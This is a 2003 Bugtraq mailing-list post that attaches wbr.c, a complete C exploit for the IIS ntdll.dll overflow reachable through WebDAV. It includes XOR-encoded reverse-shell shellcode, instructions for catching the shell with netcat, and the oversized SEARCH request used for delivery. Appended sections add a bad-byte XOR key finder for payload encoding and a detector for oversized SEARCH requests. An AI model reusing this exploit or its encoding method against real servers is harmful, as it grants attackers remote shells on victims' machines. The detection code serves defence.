[29448] in bugtraq
WebDav Exploit ffs
daemon@ATHENA.MIT.EDU (Rafael Núñez)
Mon Mar 24 14:16:16 2003
Message-ID: <021601c2f237$2f3a05d0$1500000a@scientech.com.ve>
From: Rafael Núñez <rnunez@scientech.com.ve>
To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>
Date: Mon, 24 Mar 2003 14:57:13 -0400
I've been receiving a bunch of emails asking whether the exploit I sent
to the list (iis_txt.c) was focused on the WebDAV vuln. Of course not (it was a
totally different one, based on the old *.asp like iistart.asp). If David
Litchfield read the first one he probably cried.
Regarding this, I'm sending the WebDAV exploit, tested 100% by me.
Best regards
Note: don't ask for the binary one.. please compile it yourself.
-----------------------------------------------------
Rafael Núñez
Senior Research Scientist
Latin American Security & Intelligence Operations
Scientech de Venezuela
-----------------------------------------------------
[w] http://www.scientech.com.ve
[e] rnunez@scientech.com.ve
----------------------------------------------------
Tlf.:(58-212) 952.42.66
Fax:(58-212) 951.36.35
----------------------------------------------------
Attachment: wbr.c
/*******************************************************************/
/* [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt]        */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV.               */
/* run a netcat ex: nc -L -vv -p 666                               */
/* wb server.com your_ip 666 0                                     */
/* the shellcode is a reverse remote shell                         */
/* you need to pad a bit.. the best way I think is launching       */
/* the exploit with pad = 0 and after that, the server will be     */
/* down for a couple of seconds, now retry with pad at 1           */
/* and so on..pad 2.. pad 3.. if you haven't the shell after       */
/* something like pad at 10 I think you better to restart from     */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but     */
/* on all the others servers it was at 2,3,4, etc..sometimes       */
/* you can have the force with you, and get the shell in 1 try     */
/* sometimes you need to pad more than 10 times ;)                 */
/* the shellcode was coded by myself, it is SEH + ScanMem to       */
/* find the famous offsets (GetProcAddress)..                      */
/* I know I code like a pig, my english sucks, and my tech too     */
/* it is my first exploit..and my first shellcode..sorry :P        */
/* if you have comments feel free to mail me at:                   */
/* mailto: kralor@coromputer.net                                   */
/* or visit us at www.coromputer.net . You can speak with us       */
/* at IRC undernet channel #coromputer                             */
/* ok now the greetz:                                              */
/* [El0d1e] to help me find some information about the bug :)      */
/* tuck_ to support me ;)                                          */
/* and all my friends in coromputer crew! hein les poulets! =)     */
/*                                                                 */
/* Tested by Rafael [RaFa] Nunez rnunez@scientech.com.ve           */
/*                                                                 */
/* (take off the WSAStartup, change the closesocket, change        */
/* headers and it will run on linux boxes ;pPpPpP ).               */
/*                                                                 */
/*******************************************************************/
#ifdef _WIN32
#include <winsock.h>
#include <windows.h>
#pragma comment (lib,"ws2_32")
#else
/* POSIX build, as the header suggests: BSD sockets, no WSAStartup */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#define closesocket close
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* length of the oversized request-target; the array below keeps one
   extra byte for the terminating NUL so nothing is written past its end */
#define BUF_LEN 65536

char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"   // sockaddr_in: port at [446], ip at [448]
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";

/* probe: a SEARCH with no body makes a WebDAV-enabled IIS answer
   "411 Length Required"; anything else means no WebDAV here */
int test_host(char *host)
{
    char search[100] = "";
    int sock, n;
    struct hostent *heh;
    struct sockaddr_in hmm;
    char buf[100] = "";

    if (strlen(host) > 60) {
        printf("error: victim host too long.\r\n");
        return 1;
    }
    if ((heh = gethostbyname(host)) == 0) {
        printf("error: can't resolve '%s'", host);
        return 1;
    }
    sprintf(search, "SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n", host);
    memset(&hmm, 0, sizeof(hmm));
    hmm.sin_port = htons(80);
    hmm.sin_family = AF_INET;
    memcpy(&hmm.sin_addr, heh->h_addr_list[0], sizeof(hmm.sin_addr));
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("error: can't create socket");
        return 1;
    }
    printf("Checking WebDav on '%s' ... ", host);
    if ((connect(sock, (struct sockaddr *)&hmm, sizeof(hmm))) == -1) {
        printf("CONNECTING_ERROR\r\n");
        return 1;
    }
    send(sock, search, strlen(search), 0);
    n = recv(sock, buf, sizeof(buf) - 1, 0);
    closesocket(sock);
    /* the status code sits at offset 9 of "HTTP/1.x NNN ..." */
    if (n >= 12 && buf[9] == '4' && buf[10] == '1' && buf[11] == '1')
        return 0;
    printf("NOT FOUND\r\n");
    return 1;
}

void help(char *program)
{
    printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n", program);
    return;
}

void banner(void)
{
    printf("\r\n\t [Crpt] ntdll.dll exploit through WebDAV by kralor [Crpt]\r\n");
    printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
    return;
}

int main(int argc, char *argv[])
{
#ifdef _WIN32
    WSADATA wsaData;
#endif
    unsigned short port = 0;
    char *port_to_shell = "", *ip1 = "", data[50] = "";
    unsigned int i, j;
    unsigned int ip = 0;
    int s, PAD = 0x10, len;
    struct hostent *he;
    struct sockaddr_in crpt;
    char buffer[BUF_LEN + 1];
    char request[80000]; // huuuh, what a mess! :)
    char content[] =
    "<?xml version=\"1.0\"?>\r\n"
    "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
    "<g:sql>\r\n"
    "Select \"DAV:displayname\" from scope()\r\n"
    "</g:sql>\r\n"
    "</g:searchrequest>\r\n";

    banner();
    if ((argc < 4) || (argc > 5)) {
        help(argv[0]);
        return 1;
    }
#ifdef _WIN32
    if (WSAStartup(0x0101, &wsaData) != 0) {
        printf("error starting winsock..");
        return 1;
    }
#endif
    if (test_host(argv[1]))
        return 1;
    if (argc == 5)
        PAD += atoi(argv[4]);
    /* the server widens the URL to UTF-16, so two consecutive PAD bytes
       end up in memory as the 0x00PP00PP return address printed here */
    printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n", PAD, PAD);
    /* patch the reverse-shell target into the sockaddr_in embedded in the shellcode */
    ip = inet_addr(argv[2]); ip1 = (char *)&ip;
    shellc0de[448] = ip1[0]; shellc0de[449] = ip1[1];
    shellc0de[450] = ip1[2]; shellc0de[451] = ip1[3];
    port = htons(atoi(argv[3]));
    port_to_shell = (char *)&port;
    shellc0de[446] = port_to_shell[0];
    shellc0de[447] = port_to_shell[1];
    // we xor the shellcode [xored by 0x95 to avoid bad chars]
    // everything after the 0x34-byte decoder stub (0x1b0 bytes, through the
    // last byte of the array) is encoded; this replaces the original MSVC
    // __asm loop with the same bytes and range so any compiler can build it
    for (i = 0x34; i < 0x34 + 0x1b0; i++)
        shellc0de[i] ^= 0x95;
    if ((he = gethostbyname(argv[1])) == 0) {
        printf("error: can't resolve '%s'", argv[1]);
        return 1;
    }
    memset(&crpt, 0, sizeof(crpt));
    crpt.sin_port = htons(80);
    crpt.sin_family = AF_INET;
    memcpy(&crpt.sin_addr, he->h_addr_list[0], sizeof(crpt.sin_addr));
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("error: can't create socket");
        return 1;
    }
    printf("Connecting... ");
    if ((connect(s, (struct sockaddr *)&crpt, sizeof(crpt))) == -1) {
        printf("ERROR\r\n");
        return 1;
    }
    // No Operation.
    memset(buffer, 0x90, BUF_LEN);
    // fill the buffer with the shellcode
    for (i = 64000, j = 0; i < BUF_LEN && j < sizeof(shellc0de) - 1; i++, j++)
        buffer[i] = shellc0de[j];
    // well..it is not necessary..
    memset(buffer, PAD, 2500);
    /* we can simply put our ret in this 2 offsets.. */
    //buffer[2086]=PAD;
    //buffer[2085]=PAD;
    buffer[BUF_LEN] = 0x00;   // terminator goes in the spare byte, not past the array
    memset(request, 0, sizeof(request));
    memset(data, 0, sizeof(data));
    // build the request in two steps instead of sprintf()ing request into itself
    len = sprintf(request, "SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ", buffer, argv[1]);
    sprintf(request + len, "%d\r\n\r\n", (int)strlen(content));
    printf("CONNECTED\r\nSending evil request... ");
    send(s, request, strlen(request), 0);
    send(s, content, strlen(content), 0);
    printf("SENT\r\n");
    // a vulnerable server dies without answering; an answer means it survived
    recv(s, data, sizeof(data) - 1, 0);
    if (data[0] != 0x00) {
        printf("Server seems to be patched.\r\n");
        printf("data: %s\r\n", data);
    } else
        printf("Now if you are lucky you will get a shell.\r\n");
    closesocket(s);
    return 0;
}
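The "xored by 0x95 to avoid bad chars" step in wbr.c carries a constraint the code only implies: the plaintext region must not contain the key byte itself (0x95 XOR 0x95 gives 0x00, which would cut the URL short), and the key has to be sendable because the decoder stub carries it literally. The following is an added example, not part of kralor's wbr.c or of Rafael's post: it searches for a single-byte XOR key that leaves no delivery-breaking byte in the encoded payload, checks a candidate key the way 0x95 would have to be checked, and round-trips the result. The bad-byte set is taken from how wbr.c builds its request (0x00 ends the string that sprintf copies into the URL; space, CR and LF end the request line); the sample payload bytes are constructed for the example and are not the exploit's shellcode.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Bytes the request in wbr.c cannot carry: NUL ends the %s copy of the URL,
 * and SP / CR / LF terminate the "SEARCH /<url> HTTP/1.1" request line. */
static const unsigned char BAD[] = { 0x00, 0x0a, 0x0d, 0x20 };

static int is_bad(unsigned char b)
{
    size_t k;
    for (k = 0; k < sizeof(BAD); k++)
        if (BAD[k] == b)
            return 1;
    return 0;
}

/* Number of bytes in buf that could not be sent raw. */
size_t count_bad(const unsigned char *buf, size_t len)
{
    size_t i, n = 0;
    for (i = 0; i < len; i++)
        n += is_bad(buf[i]);
    return n;
}

/* 1 if XORing every byte of buf with key yields only sendable bytes.
 * A plaintext byte equal to the key encodes to 0x00, which is why the
 * encoded region of wbr.c's shellcode must not itself contain 0x95. */
int xor_is_clean(const unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;
    if (is_bad(key))          /* the decoder stub embeds the key literally */
        return 0;
    for (i = 0; i < len; i++)
        if (is_bad(buf[i] ^ key))
            return 0;
    return 1;
}

/* Lowest single-byte key (1..255) that makes buf clean, or -1 if none. */
int find_xor_key(const unsigned char *buf, size_t len)
{
    int key;
    for (key = 1; key < 256; key++)
        if (xor_is_clean(buf, len, (unsigned char)key))
            return key;
    return -1;
}

void xor_inplace(unsigned char *buf, size_t len, unsigned char key)
{
    size_t i;
    for (i = 0; i < len; i++)
        buf[i] ^= key;
}

/* Encode a copy of src with key, verify the encoded form is clean, decode it
 * again and report whether the round trip reproduced src.  1 on success. */
int encode_roundtrip(const unsigned char *src, size_t len, unsigned char key)
{
    unsigned char tmp[512];
    if (len > sizeof(tmp))
        return 0;
    memcpy(tmp, src, len);
    xor_inplace(tmp, len, key);
    if (count_bad(tmp, len) != 0)
        return 0;
    xor_inplace(tmp, len, key);
    return memcmp(tmp, src, len) == 0;
}

/* Constructed sample: holds every bad byte, the values 0x01..0x04 (so the
 * four smallest keys are rejected) and 0x95 (so wbr.c's key is rejected). */
const unsigned char SAMPLE[] = { 0x01, 0x02, 0x03, 0x04, 0x00, 0x95, 0x0a, 0x20, 0x0d };
const size_t SAMPLE_LEN = sizeof(SAMPLE);

/* Constructed sample with the NUL-heavy shape of the real shellcode and no
 * byte that 0x95 would map onto a bad byte (0x95, 0x9f, 0x98, 0xb5). */
const unsigned char NULL_HEAVY[] = { 0x8b, 0x64, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x58, 0x5d };
const size_t NULL_HEAVY_LEN = sizeof(NULL_HEAVY);

int main(void)
{
    int key = find_xor_key(SAMPLE, SAMPLE_LEN);
    unsigned char enc[sizeof(SAMPLE)];
    size_t i;
    printf("raw sample has %u bad byte(s)\n", (unsigned)count_bad(SAMPLE, SAMPLE_LEN));
    printf("key 0x95 clean for sample: %d, for null-heavy: %d\n",
           xor_is_clean(SAMPLE, SAMPLE_LEN, 0x95),
           xor_is_clean(NULL_HEAVY, NULL_HEAVY_LEN, 0x95));
    printf("first usable key for sample: 0x%02x\n", key);
    memcpy(enc, SAMPLE, SAMPLE_LEN);
    xor_inplace(enc, SAMPLE_LEN, (unsigned char)key);
    for (i = 0; i < SAMPLE_LEN; i++)
        printf("\\x%02x", enc[i]);
    printf("\n");
    return 0;
}
```

The list in BAD is deliberately the minimum the page's own request construction forces; a URL that the server decodes or normalises would add more bytes to it, and the same search then simply runs over the longer list.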
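On the defensive side, the request wbr.c sends is easy to tell apart from the short `SEARCH /` that its own test_host probe sends: the method is SEARCH and the request-target is tens of thousands of bytes long. The request-line check below is an added example, not part of the original post or of wbr.c; the threshold and the sample requests are constructed for the example, and a real sensor would tune the threshold and record the source address and Host header alongside the hit.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

/* Request-target length above which a SEARCH is flagged.  wbr.c sends 65536
 * bytes; a benign DAV path is far shorter.  Constructed threshold. */
#define SEARCH_URI_LIMIT 4096

/* Inspect the first line of a raw HTTP request.  Returns 1 when the method is
 * SEARCH and the request-target is at least `limit` bytes long, 0 otherwise.
 * Takes a byte count rather than a NUL-terminated string, as a capture would,
 * and a truncated capture with no terminator still counts its visible length. */
int is_oversized_search(const unsigned char *req, size_t n, size_t limit)
{
    const char *method = "SEARCH ";
    size_t mlen = strlen(method), i, target_len = 0;

    if (n < mlen || memcmp(req, method, mlen) != 0)
        return 0;
    for (i = mlen; i < n; i++) {
        unsigned char c = req[i];
        if (c == ' ' || c == '\r' || c == '\n')
            break;                /* end of the request-target token */
        target_len++;
    }
    return target_len >= limit;
}

/* Build a SEARCH request whose request-target is "/" followed by uri_len 'A'
 * bytes, in the same shape as the request wbr.c sends.  Caller frees. */
unsigned char *make_search_request(size_t uri_len, size_t *out_len)
{
    const char *head = "SEARCH /";
    const char *tail = " HTTP/1.1\r\nHost: victim\r\nContent-type: text/xml\r\nContent-Length: 0\r\n\r\n";
    size_t hl = strlen(head), tl = strlen(tail);
    unsigned char *buf = malloc(hl + uri_len + tl);
    if (!buf)
        return NULL;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', uri_len);
    memcpy(buf + hl + uri_len, tail, tl);
    *out_len = hl + uri_len + tl;
    return buf;
}

/* Convenience: build a request of the given target length, run the check,
 * free it.  Returns the check result, or -1 on allocation failure. */
int check_request_of_len(size_t uri_len)
{
    size_t n;
    int hit;
    unsigned char *req = make_search_request(uri_len, &n);
    if (!req)
        return -1;
    hit = is_oversized_search(req, n, SEARCH_URI_LIMIT);
    free(req);
    return hit;
}

int main(void)
{
    /* constructed samples: the probe test_host sends, an ordinary SEARCH,
       and a request-target of the size wbr.c sends */
    const char *probe = "SEARCH / HTTP/1.1\r\nHost: victim\r\n\r\n";
    printf("probe:    %d\n", is_oversized_search((const unsigned char *)probe, strlen(probe), SEARCH_URI_LIMIT));
    printf("ordinary: %d\n", check_request_of_len(200));
    printf("exploit:  %d\n", check_request_of_len(65536));
    return 0;
}
```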